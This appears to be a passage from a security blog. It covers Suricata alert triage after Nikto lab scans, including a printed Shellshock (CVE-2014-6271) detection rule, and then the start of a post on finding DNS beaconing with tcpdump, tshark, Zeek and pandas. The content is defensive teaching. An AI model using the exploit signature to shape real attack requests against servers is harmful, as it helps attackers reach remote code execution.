</div><div><br /></div><div><div>What are the priorities of the these alerts?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[Priority.*?\]' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort | uniq --count </span>
<span style="color: white;"> 43 [Priority: 1]</span>
<span style="color: white;"> 20 [Priority: 2]</span>
<span style="color: white;"> 2 [Priority: 3]</span>
</pre></div>
</div><div><br /></div><div><div>The majority of alerts are priority 1. Hmmm!</div><div><br /></div><div>Looking at the classifications.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp '\[Classification.*?\]' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 40 [Classification: Attempted Administrator Privilege Gain]</span>
<span style="color: white;"> 9 [Classification: Attempted Information Leak]</span>
<span style="color: white;"> 9 [Classification: access to a potentially vulnerable web application]</span>
<span style="color: white;"> 3 [Classification: Web Application Attack]</span>
<span style="color: white;"> 2 [Classification: Potentially Bad Traffic]</span>
<span style="color: white;"> 2 [Classification: Generic Protocol Command Decode]</span>
</pre></div>
</div><div><br /></div><div><div>What alerts are associated with "<i>Attempted Administrator Privilege Gain</i>"</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat fast.log.1 | grep --perl-regexp 'Attempted Administrator Privilege Gain' | cut --fields=3- --delimiter=' ' |sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 26 [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37600 -> 10.0.0.106:80</span>
<span style="color: white;"> 12 [**] [1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37616 -> 10.0.0.106:80</span>
<span style="color: white;"> 2 [**] [1:2019904:5] ET EXPLOIT QNAP Shellshock CVE-2014-6271 [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.0.0.107:37600 -> 10.0.0.106:80</span>
</pre></div>
</div><div><br /></div><div>Looking at the rule for "<i>ET WEB_SERVER Possible CVE-2014-6271 Attempt</i>".</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff]</span>
<span style="color: white;">└─$ cat /var/lib/suricata/rules/suricata.rules | grep "2022028"</span>
<span style="color: white;">alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SERVER Possible CVE-2014-6271 Attempt"; flow:established,to_server; content:" HTTP/1."; pcre:"/^[^\r\n]*?HTTP\/1(?:(?!\r?\n\r?\n)[\x20-\x7e\s]){1,500}\n[\x20-\x7e]{1,100}\x3a[\x20-\x7e]{0,500}\x28\x29\x20\x7b/s"; content:"|28 29 20 7b|"; fast_pattern; reference:url,blogs.akamai.com/2014/09/environment-bashing.html; classtype:attempted-admin; sid:2022028; rev:2; metadata:created_at 2015_11_04, updated_at 2019_10_08;)</span>
</pre></div>
</div><div><br /></div><div><div>These all seems to be associated with <i>Shellock </i>and since the device this web server is running on is a Windows based system. I will conclude these are all false positives.</div><div><br /></div><div>Do we have anything relating to "<i>/img</i>" as we saw in the log and packet analysis?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_1]</span>
<span style="color: white;">└─$ cat /var/log/suricata/alert-debug.log.1 | grep --ignore-case "img"</span>
</pre></div>
</div><div><br /></div><div><div>Hmm nothing returned.</div><div><br /></div><div>Moving on from the IDS analysis.</div><div><br /></div><div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div></div><div><br /></div><div><b>Reference</b>:</div><div><a href="https://github.com/sullo/nikto" target="_blank">https://github.com/sullo/nikto</a></div><div><a href="https://github.com/digininja/DVWA" target="_blank">https://github.com/digininja/DVWA</a></div><div><a href="https://security.stackexchange.com/questions/185457/nikto-this-might-be-interesting-file-redirects" target="_blank">https://security.stackexchange.com/questions/185457/nikto-this-might-be-interesting-file-redirects</a></div><div><a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458</a></div><div><a href="https://www.amazon.com/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024" target="_blank">https://www.amazon.com/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024</a></div><div><a href="https://hackertarget.com/nikto-tutorial/" target="_blank">https://hackertarget.com/nikto-tutorial/</a></div><div><a href="https://adamtheautomator.com/suricata/" target="_blank">https://adamtheautomator.com/suricata/</a></div><div><a href="https://www.rfc-editor.org/rfc/rfc2616" target="_blank">https://www.rfc-editor.org/rfc/rfc2616</a></div><div><a href="https://serverfault.com/questions/322612/what-exactly-are-propfind-put-delete-requests-and-how-can-i-use-it" target="_blank">https://serverfault.com/questions/322612/what-exactly-are-propfind-put-delete-requests-and-how-can-i-use-it</a></div><div><a href="https://www.rfc-editor.org/rfc/rfc4918" target="_blank">https://www.rfc-editor.org/rfc/rfc4918</a></div><div><a href="https://stackoverflow.com/questions/71142211/what-is-propfind-request" target="_blank">https://stackoverflow.com/questions/71142211/what-is-propfind-request</a></div><div><a href="https://techcommunity.microsoft.com/t5/iis-support-blog/http-track-and-trace-verbs/ba-p/784482" target="_blank">https://techcommunity.microsoft.com/t5/iis-support-blog/http-track-and-trace-verbs/ba-p/784482</a></div><div><a href="https://www.oreilly.com/library/view/intrusion-detection-with/157870281X/157870281X_app02lev1sec8.html" target="_blank">https://www.oreilly.com/library/view/intrusion-detection-with/157870281X/157870281X_app02lev1sec8.html</a></div><div><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash" target="_blank">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash</a></div><div><a href="https://nvd.nist.gov/vuln/detail/CVE-2014-6271" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2014-6271</a></div></div><div><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-40775322780764382102023-10-09T09:22:00.004-07:002023-10-12T11:29:55.242-07:00Beginning Fourier Transform - Detecting Beaconing in our networks<p>Before digging any deeper, I must state, this notebook/post heavily leverages the work done by <a href="https://www.linkedin.com/in/joe-petroske-8a54855/" target="_blank">Joe Petroske</a> on "<a href="https://www.youtube.com/watch?v=twI4pllhElY" target="_blank">Hunting Beacon Activity with Fourier Transforms</a>" along with his notebook on GitHub at <a href="https://github.com/target/Threat-Hunting/blob/master/Beacon%20Hunting/find_beacons_by_fourier.ipynb" target="_blank">https://github.com/target/Threat-Hunting/blob/master/Beacon%20Hunting/find_beacons_by_fourier.ipynb</a>. </p><p>More importantly, it ties together what we teach in the SANS SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals as a relates to leveraging Fourier Analysis to find beacons: https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/</p><p>While as mentioned above, this notebook/post leverages the above content heavily, we will move this from a problem to a solution. Meaning, we will start from scratch and then implement the solution, once again, based heavily on Joe's code. This way, when you are about to implement this in your environment, you are clear on how you can solve your problems.</p><p>You can grab the link to my notebook from my <a href="https://github.com/SecurityNik/Data-Science-and-ML/blob/main/Beginning%20Fourrier%20Transform%20for%20Beacon%20Detection%20-%20Blog.ipynb" target="_blank">GitHub</a>:</p><p><span style="font-size: medium;"><b>Issue/Problem/Concern:</b></span></p><p>One day, while capturing some packets for an unrelated issue, I saw the following:</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ sudo tcpdump -n --interface 2 '(port 53) and not (host 127.0.0.1)' -c 10 </span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode </span>
<span style="color: white;">listening on any, link-type EN10MB (Ethernet), snapshot length 262144 bytes </span>
<span style="color: white;">18:39:24.124355 IP 10.0.0.9.46088 > 10.0.0.2.53: 40639+ A? somedomain.securitynik.local. (44) </span>
<span style="color: white;">18:39:24.124604 IP 10.0.0.2.53 > 10.0.0.9.46088: 40639 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.55, A 172.16.16.211 (203) </span>
<span style="color: white;">18:39:26.134773 IP 10.0.0.9.50992 > 10.0.0.2.53: 40640+ A? somedomain.securitynik.local. (44) </span>
<span style="color: white;">18:39:26.135072 IP 10.0.0.2.53 > 10.0.0.9.50992: 40640 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.211, A 172.16.16.55 (203) </span>
<span style="color: white;">18:39:28.144568 IP 10.0.0.9.49995 > 10.0.0.2.53: 40641+ A? somedomain.securitynik.local. (44) </span>
<span style="color: white;">18:39:28.144829 IP 10.0.0.2.53 > 10.0.0.9.49995: 40641 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.55, A 172.16.16.211 (203) </span>
<span style="color: white;">18:39:29.172416 IP 10.0.0.32.41636 > 10.0.0.2.53: 2+ A? pool.ntp.org. (30) </span>
<span style="color: white;">18:39:29.181785 IP 10.0.0.2.53 > 10.0.0.32.41636: 2 4/0/0 A 162.159.200.123, A 137.220.55.232, A 217.180.209.214, A 209.115.181.107 (94)</span>
<span style="color: white;">...</span>
</pre></div>
<p></p><p><span style="font-size: medium;"><b>Did you see anything interesting? </b></span></p><p>I doubt whether at first glance, you saw what the issue is. Do you see the issue now that I have highlighted the time below?</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ sudo tcpdump -n --interface 2 '(port 53) and not (host 127.0.0.1)' -c 10 </span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode </span>
<span style="color: white;">listening on any, link-type EN10MB (Ethernet), snapshot length 262144 bytes </span>
<span><b><span style="color: #fcff01;">**18:39:24**</span></b><span style="color: white;">.124355 IP 10.0.0.9.46088 > 10.0.0.2.53: 40639+ A? somedomain.securitynik.local. (44) </span></span>
<span><b><span style="color: #fcff01;">**18:39:24**</span></b><span style="color: white;">.124604 IP 10.0.0.2.53 > 10.0.0.9.46088: 40639 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.55, A 172.16.16.211 (203) </span></span>
<span><b><span style="color: #fcff01;">**18:39:26**</span></b><span style="color: white;">.134773 IP 10.0.0.9.50992 > 10.0.0.2.53: 40640+ A? somedomain.securitynik.local. (44) </span></span>
<span style="color: #fcff01;"><b>**18:39:26**</b></span><span style="color: white;">.135072 IP 10.0.0.2.53 > 10.0.0.9.50992: 40640 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.211, A 172.16.16.55 (203) </span>
<span><b><span style="color: #fcff01;">**18:39:28**</span></b><span style="color: white;">.144568 IP 10.0.0.9.49995 > 10.0.0.2.53: 40641+ A? somedomain.securitynik.local. (44) </span></span>
<span><b><span style="color: #fcff01;">**18:39:28**</span></b><span style="color: white;">.144829 IP 10.0.0.2.53 > 10.0.0.9.49995: 40641 4/0/0 CNAME somedomain.ca.securitynik.local., CNAME securitynik-something.us-east-1.elb.amazonaws.com., A 172.16.16.55, A 172.16.16.211 (203) </span></span>
<span style="color: white;">18:39:29.172416 IP 10.0.0.32.41636 > 10.0.0.2.53: 2+ A? pool.ntp.org. (30) </span>
<span style="color: white;">18:39:29.181785 IP 10.0.0.2.53 > 10.0.0.32.41636: 2 4/0/0 A 162.159.200.123, A 137.220.55.232, A 217.180.209.214, A 209.115.181.107 (94) </span>
<span style="color: white;">...</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>This DNS query is being made every 2 seconds it seems. </p><p>This may be some type of beaconing. Or maybe it is just normal activity. </p><p>Let's dig a bit deeper with TShark to see that there is definitely something worth paying attention to. </p><p>Capture and write a few packets with <i>tcpdump </i>to the file system. </p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ **sudo tcpdump -n --interface 2 '(port 53) and not (host 127.0.0.1)' -v -w /tmp/dns-beacon.pcap** </span>
<span style="color: white;">tcpdump: listening on any, link-type EN10MB (Ethernet), snapshot length 262144 bytes </span>
<span style="color: white;">^C368 packets captured </span>
<span style="color: white;">368 packets received by filter </span>
</pre></div>
</div><div><br /></div><div>Take a view of some of the statistics from TShark for this specific host at 10.0.0.9</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ tshark -n -r /tmp/dns-beacon.pcap -q -z "io,stat,2,ip.addr==10.0.0.9 && udp.port==53" -t ad | more </span>
<span style="color: white;">=============================================== </span>
<span style="color: white;">| IO Statistics | </span>
<span style="color: white;">| | </span>
<span style="color: white;">| Duration: 205. 49758 secs | </span>
<span style="color: white;">| Interval: 2 secs | </span>
<span style="color: white;">| | </span>
<span style="color: white;">| Col 1: ip.addr==10.0.0.9 && udp.port==53 | </span>
<span style="color: white;">|---------------------------------------------| </span>
<span style="color: white;">| |1 | | </span>
<span style="color: white;">| Date and time | Frames | Bytes | | </span>
<span style="color: white;">|--------------------------------------| | </span>
<span style="color: white;">| 2023-10-01 18:46:05 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:07 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:09 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:11 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:13 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:15 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:17 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:19 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:21 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:23 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:25 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:27 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:29 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:31 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:33 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:35 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:37 | 2 | 331 | | </span>
<span style="color: white;">| 2023-10-01 18:46:39 | 2 | 331 | | </span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Clearly from above, we can see there is something interesting. Every 2 seconds, we have 2 frames of the same size 331 bytes. </div><div><br /></div><div>At this point, we can connect to the host to attempt to learn which process might be making this request. </div><div><br /></div><div>I'm taking a different route, as this post/notebook is about looking at things from the network perspective. </div><div><br /></div><div>Fortunately for us, one of the tools in this monitored environment is Zeek. A Security monitoring framework we spend a lot of time on during day 4 of the <a href="https://www.sans.org/cyber-security-courses/network-monitoring-threat-detection/ " target="_blank">SANS SEC503: Network Monitoring and Threat Detection In-Depth</a>.</div><div><br /></div><div>While I can pull this specific log, let's instead go back in time to extract a historical log. More specifically, I'm taking a log of the time we know this network should not be busy. Let's take a log file that should have records for between 01:00 and 02:00 AM.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ ** ls /opt/zeek/logs/2023-10-01/dns.01\:00\:00-02\:00\:00.log.gz** </span>
<span style="color: white;">/opt/zeek/logs/2023-10-01/dns.01:00:00-02:00:00.log.gz </span>
</pre></div>
</div><div><br /></div><div>Let's read this log with <i>zcat</i> and then pipe it into <i>jq</i> then output it to a file</div><div><br /></div><div><div>Here is what a sample from the Zeeks DNS log look like in NSON.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ zcat /opt/zeek/logs/2023-10-01/dns.01\:00\:00-02\:00\:00.log.gz | jq '.' | more </span>
<span style="color: white;">{ </span>
<span style="color: white;"> "ts": 1696122000.354959, </span>
<span style="color: white;"> "uid": "CZ7wYd2iz86Xl4KbKl", </span>
<span style="color: white;"> "id.orig_h": "10.0.0.4",</span>
<span style="color: white;"> "id.orig_p": 45084,</span>
<span style="color: white;"> "id.resp_h": "172.17.17.202",</span>
<span style="color: white;"> "id.resp_p": 53,</span>
<span style="color: white;"> "proto": "udp",</span>
<span style="color: white;"> "trans_id": 45635,</span>
<span style="color: white;"> "query": "4.0.0.10.in-addr.arpa",</span>
<span style="color: white;"> "qclass": 1,</span>
<span style="color: white;"> "qclass_name": "C_INTERNET",</span>
<span style="color: white;"> "qtype": 12,</span>
<span style="color: white;"> "qtype_name": "PTR",</span>
<span style="color: white;"> "rcode": 3,</span>
<span style="color: white;"> "rcode_name": "NXDOMAIN",</span>
<span style="color: white;"> "AA": false,</span>
<span style="color: white;"> "TC": false,</span>
<span style="color: white;"> "RD": true,</span>
<span style="color: white;"> "RA": false,</span>
<span style="color: white;"> "Z": 0,</span>
<span style="color: white;"> "rejected": false</span>
<span style="color: white;">}</span>
</pre></div>
</div><div><br /></div><div><div>Writing the log out to a file that can be read by Pandas </div><div>Notice the "--slurp". If I don't use this, Pandas is going to complain about some trailing data issue and fail to read the file: See this link: <a href="https://datascientyst.com/fix-valueerror-trailing-data-pandas-and-json/" target="_blank">https://datascientyst.com/fix-valueerror-trailing-data-pandas-and-json/</a></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@peeper:~$ cat /opt/zeek/logs/2023-10-01/dns.01\:00\:00-02\:00\:00.log.gz | jq '.' --slurp > /tmp/dns-beacon-blog.json</span>
<span style="color: white;">securitynik@peeper:~$ ls /tmp/dns-beacon-blog.json</span>
<span style="color: white;">/tmp/dns-beacon-blog.json </span>
</pre></div>
</div><div><br /></div><div>With this file in place, let's now copy the file to our local system where we will leverage some data science and the Fast Fourier Transform algorithm to solve this beaconing issue once and for all :-) </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\Users\SecurityNik>scp securitynik@peeper:/tmp/dns-beacon-blog.json d:\ml\dns-beacon-blog.json </span>
<span style="color: white;">securitynik@peeper's password: </span>
<span style="color: white;">dns-beacon-blog.json 100% 5337KB 12.4MB/s 00:00 </span>
</pre></div>
</div><div><br /></div><div>Load some libraries to start getting the real work done</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">import numpy as np</span>
<span style="color: white;">import pandas as pd</span>
<span style="color: white;">import plotly.express as px</span>
<span style="color: white;">import plotly.graph_objects as go</span>
<span style="color: white;">import matplotlib.pyplot as plt</span>
</pre></div>
</div><div><br /></div><div><div>Read our DNS Zeek log data. Do note, while I am using the DNS log, you can use any log file you want that is coming out of Zeek. Notice though, my file is in JSON format. If you have a .CSV file, you will need to read that instead. This also means you may need to make other changes as you read your input.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns = pd.read_json(r'd:/ML/dns-beacon-blog.json', date_unit='s')</span>
<span style="color: white;">df_dns</span>
<span style="color: white;">ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto trans_id query qclass ... rcode_name AA TC RD RA Z rejected rtt answers TTLs</span>
<span style="color: white;">0 1.696122e+09 CZ7wYd2iz86Xl4KbKl 10.0.0.4 45084 172.17.17.202 53 udp 45635 4.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">1 1.696122e+09 CZ7wYd2iz86Xl4KbKl 10.0.0.4 45084 172.17.17.202 53 udp 45635 4.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">2 1.696122e+09 C3uf182pULaa9EMXSk 10.0.0.4 50481 172.17.17.202 53 udp 22814 37.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">3 1.696122e+09 C3uf182pULaa9EMXSk 10.0.0.4 50481 172.17.17.202 53 udp 22814 37.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">4 1.696122e+09 CCUXAw1G7JacmmyKg5 10.0.0.4 57870 172.17.17.202 53 udp 43043 2.0.0.10.in-addr.arpa 1.0 ... NXDOMAIN False False True False 0 False NaN NaN NaN</span>
<span style="color: white;">... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...</span>
<span style="color: white;">8212 1.696126e+09 CKcOYZKBKoynKzGWb 10.0.0.8 45024 172.17.17.198 53 udp 60189 3.pool.ntp.org 1.0 ... NOERROR False False True True 0 False 0.015551 [192.95.0.223, 158.69.20.38, 174.94.155.224, 1... [26, 26, 26, 26]</span>
<span style="color: white;">8213 1.696126e+09 Cybpy5GqwGfARfcBd 10.0.0.8 47334 172.17.17.198 53 udp 60445 time.google.com 1.0 ... NOERROR False False True True 0 False 0.015610 [216.239.35.8, 216.239.35.12, 216.239.35.0, 21... [13571, 13571, 13571, 13571]</span>
<span style="color: white;">8214 1.696126e+09 CoJXrj4DErFd7n6BMk 10.0.0.9 40965 10.0.0.2 53 udp 10875 somedomain.securitynik.local 1.0 ... NOERROR False False True True 0 False 0.000250 [somedomain.ca.securitynik.local, a37295100167... [83, 23, 23, 23]</span>
<span style="color: white;">8215 1.696126e+09 CPwL9M3cooP7rtZmB9 10.0.0.24 36625 10.0.0.2 53 udp 44475 i.ytimg.com 1.0 ... NOERROR False False True True 0 False 0.013948 [142.251.33.182, 142.251.41.86, 142.251.32.86,... [274, 274, 274, 274]</span>
<span style="color: white;">8216 1.696126e+09 CQVtNH8FvtlwO44Fl 10.0.0.24 58969 10.0.0.2 53 udp 60354 youtubei.googleapis.com 1.0 ... NOERROR False False True True 0 False 0.035568 [142.251.32.74, 142.251.41.42, 172.217.1.10, 1... [249, 249, 249, 249, 249, 249]</span>
<span style="color: white;">8217 rows × 24 columns</span>
</pre></div>
</div><div><br /></div><div><div>Get the list of columns. I need this as I will drop a few columns.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns.columns</span>
<span style="color: white;">Index(['ts', 'uid', 'id.orig_h', 'id.orig_p', 'id.resp_h', 'id.resp_p',</span>
<span style="color: white;"> 'proto', 'trans_id', 'query', 'qclass', 'qclass_name', 'qtype',</span>
<span style="color: white;"> 'qtype_name', 'rcode', 'rcode_name', 'AA', 'TC', 'RD', 'RA', 'Z',</span>
<span style="color: white;"> 'rejected', 'rtt', 'answers', 'TTLs'],</span>
<span style="color: white;"> dtype='object')</span>
</pre></div>
</div><div><br /></div><div><div>Let's go ahead and drop some of these columns that are of no use to us. I'm keeping the port to also see if all of this activity is occurring on the same source port. Dropping the destination port as we know this is DNS. Definitely keeping the timestamp as this is what Joe used in his code to find beacons. It is also what we will use. Definitely also keeping the query as we need to know what domain the host(s) was/were trying to resolve.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns = df_dns.drop(columns=[ 'uid', 'id.resp_p', 'proto', 'trans_id', 'qclass', 'qclass_name', 'qtype', 'qtype_name', 'rcode', 'rcode_name', 'AA', 'TC', 'RD', 'RA', 'Z', 'rejected', 'rtt', 'answers', 'TTLs'], inplace=False)</span>
<span style="color: white;"># View the first 5 records</span>
<span style="color: white;">df_dns.iloc[:5]</span>
<span style="color: white;">ts id.orig_h id.orig_p id.resp_h query</span>
<span style="color: white;">0 1.696122e+09 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
